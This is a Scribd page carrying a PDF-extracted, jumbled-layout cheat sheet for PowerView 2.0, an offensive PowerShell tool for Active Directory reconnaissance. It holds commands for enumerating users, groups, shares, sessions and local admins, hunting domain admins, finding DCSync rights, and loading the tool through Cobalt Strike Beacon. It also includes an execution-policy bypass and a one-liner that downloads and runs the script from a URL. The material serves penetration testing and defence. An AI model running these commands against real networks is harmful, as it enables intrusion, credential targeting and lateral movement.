Scribd Logo
Carica

Benvenuto in Scribd!

  • PowerView PDF

    Caricato da

    DD NN
    48 visualizzazioni2 pagine
    The document provides a cheat sheet for the Powerview 2.0 tool, which can be used to enumerate information on a domain through LDAP queries. It lists common commands for discovering computers, users, groups and their members on a domain. It describes options for the commands to filter results, write output to files, and reflect queries through a specific domain controller.

    Descrizione originale:

    Titolo originale

    PowerView.pdf

    Copyright

    © © All Rights Reserved

    Formati disponibili

    PDF, TXT o leggi online da Scribd

    Hai trovato utile questo documento?

    Questo contenuto è inappropriato?

    Segnala questo documento
    The document provides a cheat sheet for the Powerview 2.0 tool, which can be used to enumerate information on a domain through LDAP queries. It lists common commands for discovering computers, users, groups and their members on a domain. It describes options for the commands to filter results, write output to files, and reflect queries through a specific domain controller.

    Copyright:

    © All Rights Reserved
    Scarica in formato PDF, TXT o leggi online su Scribd
    Segnala contenuti inappropriati
    48 visualizzazioni2 pagine

    PowerView PDF

    Caricato da

    DD NN
    The document provides a cheat sheet for the Powerview 2.0 tool, which can be used to enumerate information on a domain through LDAP queries. It lists common commands for discovering computers, users, groups and their members on a domain. It describes options for the commands to filter results, write output to files, and reflect queries through a specific domain controller.

    Copyright:

    © All Rights Reserved
    Scarica in formato PDF, TXT o leggi online su Scribd
    Segnala contenuti inappropriati
    di 2

    Powerview

    2.0 Cheat Sheet Write to .xml object …| Export-Clixml Computer Enumeration


    obj.xml Get-NetComputer will enumerate computer objects on a
    Read .xml object $obj = Import-Clixml given domain through LDAP, returning hostnames by
    obj.xml default.
    Return only live hosts -Ping
    Common Cmdlet Options
    Display verbose Full computer objects (not -FullData
    -Verbose
    status/debug information just hostnames)

    Add a 10 second delay Search w/ specific LDAP -Filter
    Getting Started -Delay 10
    between enumerating filter "(description=*web*)"
    Get PowerView: http://bit.ly/1pzQCnv
    each machine Search specific domain -ADSpath
    Load from disk: 1) C:\> powershell –exec bypass 2) PS ADS path (e.g. OUs) "LDAP://OU=secret, ..."
    C:\> Import-Module powerview.ps1 Execute a “meta” function -Threads 15
    with 15 threads Machines with -Unconstrained
    Load from GitHub: PS C:\> IEX (New-Object unconstrained delegation
    Net.WebClient).DownloadString(“http://bit.ly/1pzQCnv Pull information from a -Domain foreign.com
    ”) foreign domain. Otherwise Identifying Your Prey
    functions default to the Get-NetGroup will enumerate group objects themselves
    Run on non-domain joined machine: 1) configure DNS to current domain.
    point to DC of domain, 2) runas /netonly on a given domain through LDAP.
    /user:DOMAIN\user powershell.exe Reflect LDAP queries -DomainController Return specific name -GroupName *admin*
    through a specific DC dc.domain.com results
    Load in Cobalt Strike’s Beacon: beacon> powershell-
    import /local/path/to/powerview.ps1 , then beacon> Execute a -ComputerName Full group objects -FullData
    powershell CMDLET-NAME command/search on/for a SERVER.domain.com (Nested) groups a specific -UserName USER
    specified computer.
    Getting help: PS C:\> Get-Help Cmdlet-Name [-detailed] user is a member of
    [-full] Many “search” cmdlets (e.g. Invoke-UserHunter) also
    Get-NetGroupMember will enumerate the members of a
    have additional common options:
    Most PowerView functions are implemented in Empire in specific group on a given domain through LDAP.
    situational_awareness/network/powerview/* Don’t ping machines -NoPing
    Specified group name -GroupName “Domain
    before enumerating them
    Filtering and Output Admins”
    File of computer names to -ComputerFile file.txt
    Execute a command on … | %{…Invoke- Full user objects -FullData
    enumerate
    each result object Command $_ } Recursively resolve the -Recurse
    Enumerate computers -ComputerFilter
    Filter result objects by field … | ? {$_.Field –eq X} members of any results
    found w/ specific LDAP "(description=*web*)"
    Only return certain … | Select prop1,prop2 that are groups
    filter
    properties Get-NetUser will enumerate user objects on a given
    Enumerate computers on -ComputerADSpath
    Display output as a list … | fl domain through LDAP.
    a specific ADS path (e.g. in "LDAP://OU=secret,..."
    Display output as wrapped … | ft -wrap specific OUs) Return specific name -UserName “*john*”
    table results
    File of user names to -UserFile users.txt
    Write out to file … | Out-File -Encoding search for Search w/ specific LDAP -Filter "(field=*term*)"
    Ascii out.txt filter
    Search for users w/ -UserFilter
    Write to .csv … | Export-CSV - specific LDAP filter "(description=*web*)" Return users who are (or -AdminCount
    NoTypeInformation were) a member of an
    Only search for users on a -UserADSpath
    out.csv admin protected group
    specific ADS path "LDAP://OU=secret, ..."
    Created by Will Schroeder (@harmj0y) and released under the Creative Commons v3 "Attribution" License.
    Users with a service -SPN Recursively map all Invoke- Misc. Functions
    principal name set (likely domain trusts MapDomainTrust Search domain OUs Get-NetOU
    service accounts) Find users in groups Find-ForeignUser Get all likely fileservers Get-NetFileServer
    Search specific domain -ADSpath outside of the given Get shares for a specific Get-NetShare
    ADS path "LDAP://OU=secret, ..." domain (outgoing access) machine X.domain.com
    Find-UserField will search a specified user field/property Find groups w/ users Find-ForeignGroup Get sessions for a specific Get-NetSession
    for a given term for all user objects through LDAP. outside of the given –Domain machine X.domain.com
    Specify the field to search -SearchField description domain (incoming access) target.domain.com
    Get logged on users for a Get-NetLoggedOn
    Term to search for -SearchTerm term Enumerate local Invoke- specific machine X.domain.com
    administrators in groups EnumerateLocalAdmin
    User-Hunting not in the given domain -TrustGroup Get RDP sessions (and Get-NetRDPSession
    Invoke-UserHunter will use LDAP queries and API calls to source IPs) X.domain.com
    locate users on the domain. Note: default behavior Data Mining
    Get (possibly) exploitable Get-ExploitableSystem
    searches for “Domain Admins” and touches every Invoke-ShareFinder will use LDAP queries and API calls to systems
    machine on the domain! search for open shares on the domain. Note: default
    behavior touches every machine on the domain! Power-One-Liners
    Hunt for members of a -GroupName “Web Take a GPP GUID and get all computers the local admin
    specific group Admins” Only return shares the -CheckShareAccess
    current user can read password is applied to: Get-NetOU -GUID {GPP_GUID} |
    Show all results (i.e. don’t -ShowAll %{ Get-NetComputer -ADSPath $_ }
    filter by user targets) Find-InterestingFile will recursively search a given
    local/UNC path for files matching specific criteria. Find machines the current user has local admin access
    Hunt using only session -Stealth on: Find-LocalAdminAccess
    information from file Search a specific UNC path -Path \\SERVER\Share
    Get the default domain access policy: Get-DomainPolicy
    servers/DCs Only return files with the -Terms
    | Select -Expand SystemAccess
    Hunt for users who are -TargetServer specified search terms in term1,term2,term3
    their names. See who can admin all domain controllers in the current
    effective local admins for a SERVER.domain.com
    domain: Get-NetDomainController | Get-NetLocalGroup
    given server Only return office docs -OfficeDocs
    See what objects have DCSync rights: Get-ObjectACL -
    Stop on first successful -StopOnSuccess Only return files accessed -LastAccessTime (Get-
    DistinguishedName "dc=domain,dc=local" -
    result found within the last week. Date).AddDays(-7)
    ResolveGUIDs | ? { ($_.ObjectType -match 'replication-
    Domain [Trusts] Local Admin Enumeration get') -or ($_.ActiveDirectoryRights -match 'GenericAll')}
    Info on the current domain Get-NetDomain Get-NetLocalGroup will enumerate the local Users with sidHistory set: Get-NetUser -Filter
    Domain controllers for the Get- users/groups from localhost or a remote machine. '(sidHistory=*)'
    current domain NetDomainController Enumerate local admins -ComputerName X Users with passwords > 1 year: $Date = (Get-
    Info on the current forest Get-NetForest from hostname (or IP) Date).AddYears(-1).ToFileTime();Get-NetUser -Filter
    List the local groups -ListGroups "(pwdlastset<=$Date)"
    Enumerate all domains in Get-NetForestDomain
    the current forest instead of group members Search SYSVol for common scripts: Invoke-FileFinder
    Use an alternate group -GroupName "Remote –SearchSYSVol
    Get all forest trusts for the Get-NetForestTrust
    current forest besides local admins Desktop Users" More Information
    Get all domain trusts (à la Get-NetDomainTrust Resolve and results that -Recurse http://www.harmj0y.net/blog/tag/powerview/
    nltest /trusted_domains) are groups, giving a set of
    http://www.verisgroup.com/adaptive-threat-division/
    effective users

    Created by Will Schroeder (@harmj0y) and released under the Creative Commons v3 "Attribution" License.

    Potrebbero piacerti anche